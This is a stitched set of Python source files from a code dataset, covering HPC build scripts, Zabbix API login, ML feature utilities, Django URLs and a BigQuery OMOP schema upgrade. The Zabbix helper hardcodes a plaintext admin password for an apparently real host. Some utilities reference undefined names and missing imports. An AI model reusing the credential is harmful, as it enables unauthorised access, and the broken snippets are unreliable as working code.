self.envMod['DAV_CORES'] = self.NUMPE\n\n p = subprocess.Popen(self.TEST_CMD,\n shell=True, env=self.envMod)\n p.wait()\n\n def runModuleCmd(self):\n \"\"\" implement ABC...add the lmod commands for yellowstone\n \"\"\"\n\n self.lmod = lmod.ModuleInterface()\n self.lmod.python_init(\"/glade/apps/opt/lmod/lmod/init/env_modules_python.py\")\n self.lmod.purge()\n\n for cmd in self.moduleList:\n print(\"Loading module \"+cmd)\n self.lmod.load(cmd)\n self.lmod.list()\n\n\nclass caldera(yellowstone):\n def __init__(self, compiler, test,mpilib,debug):\n \"\"\" user defined ctor so we can put stuff in a class instead of as\n class attributes\n \"\"\"\n self.test = test\n super(caldera,self).__init__(compiler, test,mpilib,debug)\n self.EXECCA = ''\n #self.TEST_CMD = ('ctest --verbose -D Experimental')\n self.TEST_CMD = ('execca ctest --verbose ')\n# os.environ[\"LMOD_DEFAULT_MODULEPATH\"]=\"/glade/apps/opt/modulefiles/ca/compilers:/glade/apps/opt/modulefiles/ca/idep\" \n\n\nclass cetus(platformBuilder):\n\n def __init__(self, compiler, test, mpilib, debug):\n \"\"\" user defined ctor so we can put stuff in a class instead of as\n class attributes\n \"\"\"\n super(cetus,self).__init__( compiler, test, mpilib, debug)\n\n self.moduleList = ['+mpiwrapper-xl ',\n '@ibm-compilers-2015-02 ',\n '+cmake ']\n\n self.srcroot = os.getcwd()\n self.BUILD_DIR = self.srcroot+\"/build_cetus_\" + compiler\n\n self.CMAKE_EXE = 'cmake '\n\n self.FC = '/home/pkcoff/mpich-sandboxes/onesidedromio/install-gpfsbgq-xl/bin/mpixlf2003_r'\n self.CC = '/home/pkcoff/mpich-sandboxes/onesidedromio/install-gpfsbgq-xl/bin/mpixlc_r'\n self.CXX = '/home/pkcoff/mpich-sandboxes/onesidedromio/install-gpfsbgq-xl/bin/mpixlcxx'\n self.LDFLAGS = '-Wl,--relax -Wl,--allow-multiple-definition -Wl,--whole-archive -L/soft/libraries/hdf5/1.8.14/cnk-xl/V1R2M2-20150213/lib -lhdf5_hl -lhdf5 -L /soft/libraries/alcf/current/xl/ZLIB/lib -lz -Wl,--no-whole-archive ' \n self.MPIEXEC = (' -D MPIEXEC:FILEPATH=/usr/bin/runjob')\n MPIEXEC_PREFLAGS =('GPFSMPIO_NAGG_PSET=16:ROMIO_HINTS=/home/pkcoff/public/romio_hints:GPFSMPIO_BALANCECONTIG=1:GPFSMPIO_AGGMETHOD=2:PAMID_TYPED_ONESIDED=1:PAMID_RMA_PENDING=1M:GPFSMPIO_BRIDGERINGAGG=1 ')\n# self.envMod['MPIEXEC_PREFLAGS'] = MPIEXEC_PREFLAGS\n # We use a sh wrapper script on cetus so we need to escape any quotes in the cmake command line \n# self.OFLAGS += ('-D MPIEXEC_PREFLAGS=\\$ENV{MPIEXEC_PREFLAGS}')\n self.NUMPE = ''\n\n self.OFLAGS += (' -D PLATFORM:STRING=cetus -DCMAKE_C_COMPILER='+self.CC)\n self.OFLAGS += (' -DCMAKE_Fortran_COMPILER='+self.FC)\n self.OFLAGS += (' -DCMAKE_CXX_COMPILER='+self.CXX)\n self.TEST_CMD = ('qsub -o pio2build.out -t 30 -n 1 --mode script '+self.srcroot+'/scripts/cetus_test.sh ')\n self.MAKE_CMD = (\"/bin/sh\"+\" ./cetus_env.sh\"+\" make all \")\n self.runModuleCmd()\n\n def buildCmd(self):\n \"\"\" run build\n \"\"\"\n p = subprocess.Popen(self.MAKE_CMD,\n shell=True, env=self.envMod)\n p.wait()\n\n def testCmd(self):\n\n p = subprocess.Popen(self.TEST_CMD,\n shell=True, env=self.envMod)\n p.wait()\n\n def runModuleCmd(self):\n \"\"\" Using the soft environment requires sourcing the soft\n environment script file - this is not possible right now\n with the current framework. So the next best option is\n to source an environment file everytime we run a command\n (cmake, make) - cetus_env.sh\n This module sources the cetus environment script and grabs\n the PNETCDF and NETCDF installation directories set by\n the script. Note that there are no soft environments for\n these libraries on Cetus\n \"\"\"\n # ~# make build directory and move to it.\n if not os.path.exists(self.BUILD_DIR):\n os.makedirs(self.BUILD_DIR)\n\n os.chdir(self.BUILD_DIR)\n f = open(\"cetus_env.sh\", 'w')\n f.write(\"#!/bin/sh -x\\n\")\n f.write(\". /etc/profile.d/00softenv.sh\\n\")\n for line in self.moduleList: \n f.write(\"soft add \"+line+\"\\n\")\n f.write(\"export LDFLAGS=\\\"\"+self.LDFLAGS+\"\\\"\\n\")\n f.write(\"echo $@\\n\")\n f.write(\"$@\\n\")\n f.close()\n \t\t\t\t\n def cmakeCmd(self):\n \"\"\" cmake command to run\n For cetus the cetus environment script, cetus_env.sh,\n is sourced before running cmake. Overriding this function\n makes this workflow easier.\n \"\"\"\n\n # ~# change environemnt, first get existing env\n self.envMod = dict(os.environ)\n # ~# add to env\n self.envMod['FC'] = self.FC\n self.envMod['CC'] = self.CC\n self.envMod['CXX'] = self.CXX\n# self.envMod['LDFLAGS'] = self.LDFLAGS\n\n cmakeString = (self.CMAKE_EXE + self.OFLAGS + self.MPIEXEC+\" \"+self.srcroot)\n cmakeString = (\"/bin/sh\"+\" ./cetus_env.sh \" +\n cmakeString )\n\n print(cmakeString)\n\n p = subprocess.Popen(cmakeString,\n shell=True, env=self.envMod)\n p.wait()\n# The cmake generated CTestTestfile.cmake has incorrect formating \n# I havent found a way to fix it in cmake (where it should be fixed)\n# replace all occurrences of '\\$' with '$' \n\n for i, line in enumerate(fileinput.input(self.BUILD_DIR+'/unittests/CTestTestfile.cmake', inplace=1)):\n sys.stdout.write(line.replace('\\$', '$')) \n\n for i, line in enumerate(fileinput.input(self.BUILD_DIR+'/test/CTestTestfile.cmake', inplace=1)):\n sys.stdout.write(line.replace('\\$', '$')) \n\n\n\n\n","sub_path":"_UNUSED_/scripts/python/builder.py","file_name":"builder.py","file_ext":"py","file_size_in_byte":16259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"300774140","text":"# -*- coding: utf-8 -*-\nfrom collective.transmogrifier.interfaces import ISection\nfrom collective.transmogrifier.interfaces import ISectionBlueprint\nfrom zope.interface import provider\nfrom zope.interface import implementer\n\nimport logging\nimport transaction\n\n\n@provider(ISectionBlueprint)\n@implementer(ISection)\nclass PartialCommit(object):\n\n\n def __init__(self, transmogrifier, name, options, previous):\n self.previous = previous\n self.step = int(options.get('every', 100))\n\n def __iter__(self):\n count = 1\n for item in self.previous:\n yield item\n if count % self.step == 0:\n transaction.commit()\n logging.info('Committed after %s' % count)\n count += 1\n","sub_path":"collective/jsonmigrator/blueprints/partialcommit.py","file_name":"partialcommit.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"245258479","text":"#!/usr/bin/env python2.7\n#coding=utf-8\n\n__author__ = \"zhuobaobao\"\n\nimport json\nimport urllib2\n\nclass Get_Authid(object):\n def __init__(self):\n self.url = \"http://monitor.15166.com/monitor/api_jsonrpc.php\"\n self.header = {\"Content-Type\":\"application/json\"}\n self.data = json.dumps(\n {\n \"jsonrpc\": \"2.0\",\n \"method\": \"user.login\",\n \"params\": {\n \"user\": \"admin\",\n \"password\": \"JoyGames2016\"\n },\n \"id\": 0\n })\n def get_authid(self):\n request = urllib2.Request(self.url,self.data)\n for key in self.header:\n request.add_header(key,self.header[key])\n result = urllib2.urlopen(request)\n response = json.loads(result.read())\n result.close()\n return response[\"result\"]\n\n\n\n","sub_path":"mysite/joygame/api/zabbix_authid.py","file_name":"zabbix_authid.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"364429754","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom __future__ import division\n\nimport json\nimport sys\n\nimport pandas as pd\nsys.path.append('..')\nfrom helpers.funcs import *\n\nfrom calculate_leaveout_polarization import get_leaveout_value\n\nconfig = json.load(open('../config.json', 'r'))\nINPUT_DIR = config['INPUT_DIR']\nOUTPUT_DIR = config['OUTPUT_DIR']\nTWEET_DIR = config['TWEET_DIR']\n\nevents = open(INPUT_DIR + 'event_names.txt', 'r').read().splitlines()\nprint(events)\n\ndef get_polarization(event, method = \"nofilter\", cluster_method = None):\n '''\n\n :param event: name of the event (str)\n :param method: \"nofilter\" (default): use all tweets\n \"noRT\": ignore retweets only\n \"clustered\": keep only tweets that were assigned to clusters; this is a subset of \"cleaned\n :param cluster_method: None, \"relative\" or \"absolute\" (see 5_assign_tweets_to_clusters.py); must have relevant files\n :return: tuple: (true value, random value)\n '''\n data = pd.read_csv(TWEET_DIR + event + '/' + event + '.csv', sep='\\t', lineterminator='\\n', usecols=['text', 'timestamp', 'user_id', 'dem_follows', 'rep_follows', 'remove', 'isRT'])\n if method == \"noRT\":\n data = filter_retweets(data)\n elif method == 'clustered':\n data = get_cluster_assignments(event, data, cluster_method)\n elif method != \"nofilter\":\n print(\"invalid method.\")\n return None\n\n print(event, len(data))\n return get_leaveout_value(event, data)\n\nif __name__ == \"__main__\":\n event_polarization = {}\n method = sys.argv[1]\n cluster_method = None if len(sys.argv) < 3 else sys.argv[2]\n for e in events:\n event_polarization[e] = tuple(get_polarization(e, method, cluster_method))\n\n cluster_method = method_name(cluster_method)\n with open(OUTPUT_DIR + 'polarization_' + method + cluster_method + '.json', 'w') as f:\n f.write(json.dumps(event_polarization))\n","sub_path":"3_leave_out_polarization/overall_polarization.py","file_name":"overall_polarization.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"231361966","text":"\"\"\"\nA store of really useful functions.\n\"\"\"\n\n\ndef log_return(list_stock_prices):\n return np.log(list_stock_prices).diff()\n\n\ndef realized_volatility(series_log_return):\n return np.sqrt(np.sum(series_log_return ** 2))\n\n\ndef calculate_wap(df):\n \"\"\"\n https://www.kaggle.com/konradb/we-need-to-go-deeper\n \"\"\"\n # a = df['bid_price1'] * df['ask_size1'] + df['ask_price1'] * df['bid_size1']\n # b = df['bid_size1']+ df['ask_size1']\n\n a1 = df[\"bid_price1\"] * df[\"ask_size1\"] + df[\"ask_price1\"] * df[\"bid_size1\"]\n a2 = df[\"bid_price2\"] * df[\"ask_size2\"] + df[\"ask_price2\"] * df[\"bid_size2\"]\n b = df[\"bid_size1\"] + df[\"ask_size1\"] + df[\"bid_size2\"] + df[\"ask_size2\"]\n\n x = (a1 + a2) / b\n return x\n\n\ndef get_log_return_df_per_time_id(file_path):\n dataset = pq.ParquetDataset(file_path)\n book_dataset = dataset.read()\n df_book_data = book_dataset.to_pandas()\n\n df_book_data[\"wap\"] = calculate_wap(df_book_data)\n df_book_data[\"log_return\"] = df_book_data.groupby([\"time_id\"])[\"wap\"].apply(\n log_return\n )\n df_book_data = df_book_data[~df_book_data[\"log_return\"].isnull()]\n\n stock_id = file_path.split(\"=\")[1]\n df_book_data[\"row_id\"] = df_book_data[\"time_id\"].apply(lambda x: f\"{stock_id}-{x}\")\n\n del dataset, book_dataset\n gc.collect()\n return df_book_data\n\n\ndef get_realized_volatility_df_per_time_id(file_path):\n # df_book_data = pd.read_parquet(file_path)\n dataset = pq.ParquetDataset(file_path)\n book_dataset = dataset.read()\n df_book_data = book_dataset.to_pandas()\n\n df_book_data[\"wap\"] = calculate_wap(book_example)\n df_book_data[\"log_return\"] = df_book_data.groupby([\"time_id\"])[\"wap\"].apply(\n log_return\n )\n df_book_data = df_book_data[~df_book_data[\"log_return\"].isnull()]\n\n df_book_data[\"realized_volatility\"] = df_book_data.groupby([\"time_id\"])[\n \"log_return\"\n ].apply(realized_volatility)\n df_book_data = df_book_data[~df_book_data[\"realized_volatility\"].isnull()]\n\n stock_id = file_path.split(\"=\")[1]\n df_book_data[\"row_id\"] = df_book_data[\"time_id\"].apply(lambda x: f\"{stock_id}-{x}\")\n\n del dataset, book_dataset\n gc.collect()\n\n return df_book_data\n\n\ndef realized_volatility_per_time_id(file_path, prediction_column_name):\n df_book = pd.read_parquet(file_path)\n df_book[\"wap\"] = calculate_wap(df_book)\n df_book[\"log_return\"] = df_book.groupby([\"time_id\"])[\"wap\"].apply(log_return)\n df_book = df_book[~df_book[\"log_return\"].isnull()]\n df_realized_vol_per_stock = pd.DataFrame(\n df_book.groupby([\"time_id\"])[\"log_return\"].agg(realized_volatility)\n ).reset_index()\n df_realized_vol_per_stock = df_realized_vol_per_stock.rename(\n columns={\"log_return\": prediction_column_name}\n )\n stock_id = file_path.split(\"=\")[1]\n df_realized_vol_per_stock[\"row_id\"] = df_realized_vol_per_stock[\"time_id\"].apply(\n lambda x: f\"{stock_id}-{x}\"\n )\n return df_realized_vol_per_stock[[\"row_id\", prediction_column_name]]\n\n\n# %%\ndef feature_engineering(df, null_val=-9999):\n for n in range(1, 3):\n p1 = df[f\"bid_price{n}\"]\n p2 = df[f\"ask_price{n}\"]\n s1 = df[f\"bid_size{n}\"]\n s2 = df[f\"ask_size{n}\"]\n df[\"WAP\"] = (p1 * s2 + p2 * s1) / (s1 + s2)\n\n df[\"log_wap\"] = df[\"WAP\"].log()\n df[\"log_wap_shifted\"] = (\n df[[\"time_id\", \"log_wap\"]]\n .groupby(\"time_id\", method=\"cudf\")\n .apply_grouped(\n cutran.get_cu_shift_transform(shift_by=1, null_val=null_val),\n incols={\"log_wap\": \"x\"},\n outcols=dict(y_out=cp.float32),\n tpb=32,\n )[\"y_out\"]\n )\n df = df[df[\"log_wap_shifted\"] != null_val]\n\n df[\"diff_log_wap\"] = df[\"log_wap\"] - df[\"log_wap_shifted\"]\n df[f\"diff_log_wap{n}\"] = df[\"diff_log_wap\"] ** 2\n\n df[\"c\"] = 1\n\n sum_df = (\n df.groupby(\"time_id\")\n .agg({\"diff_log_wap1\": {\"sum\", \"std\"}, \"diff_log_wap2\": \"sum\", \"c\": \"sum\"})\n .reset_index()\n )\n\n def f(x):\n if x[1] == \"\":\n return x[0]\n return x[0] + \"_\" + x[1]\n\n sum_df.columns = [f(x) for x in sum_df.columns]\n sum_df[\"volatility1\"] = (sum_df[\"diff_log_wap1_sum\"]) ** 0.5\n sum_df[\"volatility2\"] = (sum_df[\"diff_log_wap2_sum\"]) ** 0.5\n sum_df[\"c\"] = sum_df[\"c_sum\"].values\n sum_df[\"vol_std\"] = sum_df[\"diff_log_wap1_std\"].fillna(0).values\n sum_df[\"volatility_rate\"] = (sum_df[\"volatility1\"] / sum_df[\"volatility2\"]).fillna(\n 0\n )\n return sum_df[[\"time_id\", \"volatility1\", \"volatility_rate\", \"c\", \"vol_std\"]]\n\n","sub_path":"utilities/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"482988136","text":"#!/usr/bin/env python3\n\nimport numpy as np\nfrom typing import Tuple\n\n\nGLOVE_6B_PATH = \"../glove/glove_6b/glove.6B.50d.txt\"\n\n\ndef glove_6b_dict():\n \"\"\" Return dict with GloVe 6B embeddings \"\"\"\n def line_to_embedding(line: str) -> Tuple[str, np.ndarray]:\n tokens = line.split()\n return (tokens[0], np.asarray(tokens[1:], 'float32'))\n with open(GLOVE_6B_PATH, 'r') as f:\n embeddings = (line_to_embedding(l) for l in f)\n return {k: v for k, v in embeddings}\n\n\nif __name__ == \"__main__\":\n glove = glove_6b_dict()\n print(len(glove))\n","sub_path":"models/glove.py","file_name":"glove.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"316709238","text":"\"\"\"Siamese Networksのテスト。\"\"\"\nimport logging\nimport pathlib\n\nimport keras\nimport keras.preprocessing.image\nimport numpy as np\nimport sklearn.metrics\nfrom tqdm import tqdm\n\nfrom siamese_train import distance_np, load_image\n\nBATCH_SIZE = 32\n\nTEST_DIRS = [p for p in pathlib.Path('data/test').iterdir()]\nCLASS_NAMES = [p.name for p in TEST_DIRS]\nCLASS_NAMES_TO_ID = {class_name: i for i, class_name in enumerate(CLASS_NAMES)}\nTRAIN_DIRS = [p for p in pathlib.Path('data/train').iterdir() if p.name in CLASS_NAMES]\nassert len(TRAIN_DIRS) == len(TEST_DIRS)\n\ntry:\n import better_exceptions\nexcept BaseException:\n pass\n\n\ndef _main():\n decoder = keras.models.load_model('decoder.h5', compile=False)\n\n logging.basicConfig(level=logging.INFO, filename='siamese_result.txt', filemode='w')\n logger = logging.getLogger(__name__)\n logger.addHandler(logging.StreamHandler())\n\n X_train, y_train = [], []\n for p in TRAIN_DIRS:\n class_id = CLASS_NAMES_TO_ID[p.name]\n x_class = [x for x in p.iterdir()]\n assert len(x_class) >= 1\n X_train.extend(x_class)\n y_train.extend([class_id] * len(x_class))\n y_train = np.array(y_train)\n\n X_test, y_test = [], []\n for p in TEST_DIRS:\n class_id = CLASS_NAMES_TO_ID[p.name]\n x_class = [x for x in p.iterdir()]\n assert len(x_class) >= 1\n X_test.extend(x_class)\n y_test.extend([class_id] * len(x_class))\n assert class_id in y_train\n y_test = np.array(y_test)\n\n # trainのdecode\n feature_train = []\n for X_batch in tqdm(np.array_split(X_train, len(X_train) // BATCH_SIZE), ascii=True):\n imgs = np.array([load_image(x, train=False) for x in X_batch])\n feats = decoder.predict(imgs)\n feature_train.extend(feats)\n feature_train = np.array(feature_train)\n assert len(feature_train) == len(y_train)\n\n # testのdecode & 予測\n true_list = []\n pred_list = []\n order_list = []\n match_dist_info = []\n unmatch_dist_info = []\n for x, y in tqdm(list(zip(X_test, y_test)), ascii=True):\n img = load_image(x, train=False)\n feats = decoder.predict(np.expand_dims(img, axis=0))[0]\n distances = distance_np(feature_train, feats[np.newaxis, :])\n assert distances.shape == (len(y_train),)\n pred_test = y_train[distances.argmin(axis=0)]\n pred_list.append(pred_test)\n true_list.append(y)\n for i, j in enumerate(distances.argsort(axis=0)):\n if y == y_train[j]:\n order_list.append(i)\n break\n\n def _get_info(a):\n assert len(a) > 0\n return np.amin(a), np.amax(a), np.mean(a), np.median(a)\n match_dist_info.append(_get_info(distances[y_train == y]))\n unmatch_dist_info.append(_get_info(distances[y_train != y]))\n true_list = np.array(true_list)\n pred_list = np.array(pred_list)\n order_list = np.array(order_list)\n\n logger.info('mean order: %.1f', np.mean(order_list))\n logger.info('test accuracy: %.4f', sklearn.metrics.accuracy_score(true_list, pred_list))\n # logger.info('top 1 accuracy: %.4f', np.mean(order_list < 1))\n logger.info('top 5 accuracy: %.4f', np.mean(order_list < 5))\n logger.info('top 10 accuracy: %.4f', np.mean(order_list < 10))\n logger.info('top 15 accuracy: %.4f', np.mean(order_list < 15))\n\n def _print_info(name, aa):\n logger.info(name + ':')\n logger.info(' min: %.4f', np.mean([a[0] for a in aa]))\n logger.info(' max: %.4f', np.mean([a[1] for a in aa]))\n logger.info(' mean: %.4f', np.mean([a[2] for a in aa]))\n logger.info(' median: %.4f', np.mean([a[3] for a in aa]))\n\n _print_info('match', match_dist_info)\n _print_info('unmatch', unmatch_dist_info)\n\n\nif __name__ == '__main__':\n _main()\n","sub_path":"siamese_test.py","file_name":"siamese_test.py","file_ext":"py","file_size_in_byte":3817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"281043918","text":"import optparse\nimport sys\nimport uuid\nfrom twindb_benchmarks.providers.aws.aws_connection import AWSConnection\nfrom twindb_benchmarks.providers.aws.aws_network import AWSNetwork, AWSFirewall\nfrom twindb_benchmarks.providers.aws.aws_ssh import AWSSsh\nfrom twindb_benchmarks.providers.aws.aws_virtual_machine import VMSpec\nfrom twindb_benchmarks.providers.aws.aws_virtual_machine import AWSVirtualMachine\nfrom twindb_benchmarks.packages import sysbench\nfrom twindb_benchmarks import log\n\n\ndef main():\n parser = optparse.OptionParser('usage: %prog [options]')\n parser.add_option('-k', '--access-key', dest='access_key_id', type='string', help='Specify Access Key ID')\n parser.add_option('-s', '--access-secret', dest='access_secret', type='string', help='Specify Secret Access Key')\n parser.add_option('-z', '--zone', dest='zone', type='string', help='Availability Zone')\n\n (options, args) = parser.parse_args()\n\n if options.access_key_id is None or options.access_secret is None or options.zone is None:\n parser.print_help()\n sys.exit(1)\n\n run_uid = str(uuid.uuid4())[-8:]\n\n log.configure_logging(stderr_log_level=log.DEBUG, log_path=log.get_log_file_path(),\n run_uid=run_uid, file_log_level=log.DEBUG)\n\n connector = AWSConnection(options.access_key_id, options.access_secret, options.zone)\n connection = connector.get_connection()\n\n client_vm = None\n firewall = None\n ssh = None\n try:\n network = AWSNetwork(connection, connector.zone)\n firewall = AWSFirewall(connection, network)\n ssh = AWSSsh(connection)\n\n vm_spec = VMSpec(instance_type='t2.micro', ebs_optimized=False, ebs_volumes=[], allowed_ports=[3306])\n\n client_vm = AWSVirtualMachine(connection, network, firewall, ssh, vm_spec)\n client_vm.create()\n client_vm.wait_for_boot()\n client_vm.prepare_environment()\n\n sysbench.yum_install(client_vm)\n finally:\n if client_vm is not None:\n client_vm.delete()\n\n if firewall is not None:\n firewall.cleanup()\n \n if ssh is not None:\n ssh.delete_ssh_key()\n\nif __name__ == '__main__':\n main()\n","sub_path":"twindb-benchmarks.py","file_name":"twindb-benchmarks.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"390582767","text":"from django.conf.urls import include, url\nfrom django.contrib import admin\nfrom django.contrib.auth.views import login, logout\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^u/', include('accounts.urls')),\n url(r'^book/', include('books.urls.books')),\n url(r'^series/', include('books.urls.series')),\n url(r'^author/', include('books.urls.authors')),\n url(r'^login/$', login, {'template_name': 'accounts/login.html'}, name='login'),\n url(r'^logout/$', logout, {'template_name': 'accounts/logout.html'}, name='logout'),\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n import debug_toolbar\n\n urlpatterns += [url(r'^__debug__/', include(debug_toolbar.urls)),\n ]\n","sub_path":"mbl/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"512733501","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 2015年8月9日\n\n@author: lowitty\n\"\"\"\nimport os\n\n\ndef cmd_executable(cmd):\n def is_exe(file):\n return os.path.isfile(file) and os.access(file, os.X_OK)\n \n cmdPath, cmdFile = os.path.split(cmd)\n if cmdPath:\n if(is_exe(cmd)):\n return cmd\n else:\n for path in os.environ[\"PATH\"].split(os.pathsep):\n path = path.strip('\"')\n exe_file = os.path.join(path, cmd)\n if(is_exe(exe_file)):\n return exe_file\n return None\n","sub_path":"com/ericsson/xn/xtool/CommonFunction.py","file_name":"CommonFunction.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"641104731","text":"from os import listdir\nfrom base64 import b64encode\n\ndef detectFolders(where = \".\"):\n\tdirectories = []\n\tfor file in listdir(where):\n\t\tif len(file.split(\".\")) == 1:\n\t\t\tif not file in directories and file != \"__pycache__\":\n\t\t\t\tdirectories.append(where + \"/\" + file)\n\tmoredirs = []\n\tif directories != []:\n\t\tfor direct in directories:\n\t\t\tmoredirs += detectFolders(direct)\n\treturn [*dict.fromkeys(directories + moredirs + [\".\"]).keys()]\n\ndef embedTo(output = \"embed.py\", target = None, args = None, where = None):\n\twith open(output, \"w\") as embededFile:\n\t\tembededFile.write(\"from base64 import b64decode\\nfrom os import makedirs, remove\\nfolders = \" + str(detectFolders()) + \"\\nfor folder in folders:\\n\\tif folder != \\\".\\\":\\n\\t\\ttry:\\n\\t\\t\\tremove(folder)\\n\\t\\texcept:\\n\\t\\t\\tpass\\n\\t\\ttry:\\n\\t\\t\\tmakedirs(folder)\\n\\t\\texcept:\\n\\t\\t\\tpass\\n\")\n\t\tdirectories = detectFolders()\n\t\tfor directorio in directories:\n\t\t\tfor file in listdir(directorio):\n\t\t\t\tif file != output and len(file.split(\".\")) >= 2:\n\t\t\t\t\tif file.split(\".\")[0] not in [\"embederUtil\"]:\n\t\t\t\t\t\twith open(directorio + \"/\" + file, \"r\") as template:\n\t\t\t\t\t\t\tencoded = b64encode(template.read().encode()).decode()\n\t\t\t\t\t\t\tembededFile.write(file.split(\".\")[0] + \" = b64decode(\\\"\" + encoded + \"\\\".encode())\\n\")\n\t\t\t\t\t\t\tembededFile.write(\"open(\\\"\" + str(directorio + \"/\" + file) + \"\\\", \\\"w\\\").write(\" + file.split(\".\")[0] + \".decode())\\n\")\n\t\tif where != None:\n\t\t\tembededFile.write(\"from \" + str(where) + \" import \" + str(target) + \"\\n\")\n\t\t\tif target != None:\n\t\t\t\tembededFile.write(target + \"(\")\n\t\t\t\tif args != None:\n\t\t\t\t\tembededFile.write(\", \".join(list(map(str, args))))\n\t\t\t\tembededFile.write(\")\\n\")\n\nembedTo()","sub_path":"embederTool.py","file_name":"embederTool.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"403612316","text":"import argparse\n\nimport resources\nfrom bq_utils import list_all_table_ids, query, wait_on_jobs, BigQueryJobWaitError\nfrom utils import bq\nfrom tools import snapshot_by_query\n\nMODIFIED_FIELD_NAMES = {\n # Modified field names from 5.2 to 5.3.1\n 'modifier_source_value': {\n 'old_name': 'qualifier_source_value',\n 'new_name': 'modifier_source_value'\n },\n 'npi': {\n 'old_name': 'NPI',\n 'new_name': 'npi'\n },\n 'dea': {\n 'old_name': 'DEA',\n 'new_name': 'dea'\n },\n 'revenue_code_source_value': {\n 'old_name': 'reveue_code_source_value',\n 'new_name': 'revenue_code_source_value'\n }\n}\n\"\"\"Modified field names from 5.2 to 5.3.1\"\"\"\n\n\ndef get_field_cast_expr_with_schema_change(dest_field, source_fields):\n \"\"\"\n generates cast expression based on data_type for the field and modified column names\n\n :param dest_field: field dictionary object\n :param source_fields: list of field names in source table\n :return: col string\n \"\"\"\n\n dest_field_name = dest_field['name']\n dest_field_mode = dest_field['mode']\n dest_field_type = dest_field['type']\n if dest_field_name in source_fields:\n col = f'CAST({dest_field_name} AS {snapshot_by_query.BIGQUERY_DATA_TYPES[dest_field_type.lower()]}) AS {dest_field_name}'\n # TODO handle possible data type difference?\n else:\n if dest_field_mode == 'nullable':\n col = f'CAST(NULL AS {snapshot_by_query.BIGQUERY_DATA_TYPES[dest_field_type.lower()]}) AS {dest_field_name}'\n if dest_field_name in MODIFIED_FIELD_NAMES.keys():\n old_name = MODIFIED_FIELD_NAMES[dest_field_name][\"old_name\"]\n if old_name in source_fields:\n # Case when the field is one of the modified fields from 5.2 to 5.3\n col = f'CAST({old_name} AS {snapshot_by_query.BIGQUERY_DATA_TYPES[dest_field_type.lower()]}) AS {dest_field_name}'\n elif dest_field_mode == 'required':\n raise RuntimeError(\n f'Unable to load the field \"{dest_field_name}\" which is required in the destination table \\\n and missing from the source table')\n else:\n raise RuntimeError(\n f'Mode for \"{dest_field_name}\" is set to unexpected value \"{dest_field_mode}\".'\n )\n return col\n\n\ndef get_copy_table_query(project_id, dataset_id, table_id, client):\n\n try:\n source_table = f'{project_id}.{dataset_id}.{table_id}'\n source_fields = snapshot_by_query.get_source_fields(\n client, source_table)\n dst_fields = resources.fields_for(table_id)\n col_cast_exprs = [\n get_field_cast_expr_with_schema_change(field, source_fields)\n for field in dst_fields\n ]\n col_expr = ', '.join(col_cast_exprs)\n except (OSError, IOError, RuntimeError):\n # default to select *\n col_expr = '*'\n select_all_query = 'SELECT {col_expr} FROM `{project_id}.{dataset_id}.{table_id}`'\n return select_all_query.format(col_expr=col_expr,\n project_id=project_id,\n dataset_id=dataset_id,\n table_id=table_id)\n\n\ndef schema_upgrade_cdm52_to_cdm531(project_id,\n dataset_id,\n snapshot_dataset_id,\n overwrite_existing=True):\n \"\"\"\n :param project_id:\n :param dataset_id:\n :param snapshot_dataset_id:\n :param overwrite_existing: Default is True, False if a dataset is already created.\n :return:\n \"\"\"\n if overwrite_existing:\n snapshot_by_query.create_empty_dataset(project_id, dataset_id,\n snapshot_dataset_id)\n\n snapshot_by_query.create_empty_cdm_tables(snapshot_dataset_id)\n\n copy_table_job_ids = []\n client = bq.get_client(project_id)\n for table_id in list_all_table_ids(dataset_id):\n q = get_copy_table_query(project_id, dataset_id, table_id, client)\n results = query(q,\n use_legacy_sql=False,\n destination_table_id=table_id,\n destination_dataset_id=snapshot_dataset_id,\n batch=True)\n copy_table_job_ids.append(results['jobReference']['jobId'])\n incomplete_jobs = wait_on_jobs(copy_table_job_ids)\n if len(incomplete_jobs) > 0:\n raise BigQueryJobWaitError(incomplete_jobs)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Parse project_id and dataset_id',\n formatter_class=argparse.RawDescriptionHelpFormatter)\n parser.add_argument(\n '-p',\n '--project_id',\n action='store',\n dest='project_id',\n help='Project associated with the input and output datasets',\n required=True)\n parser.add_argument('-d',\n '--dataset_id',\n action='store',\n dest='dataset_id',\n help='Dataset where cleaning rules are to be applied',\n required=True)\n parser.add_argument('-n',\n '--snapshot_dataset_id',\n action='store',\n dest='snapshot_dataset_id',\n help='Name of the new dataset that needs to be created',\n required=True)\n args = parser.parse_args()\n\n schema_upgrade_cdm52_to_cdm531(args.project_id, args.dataset_id,\n 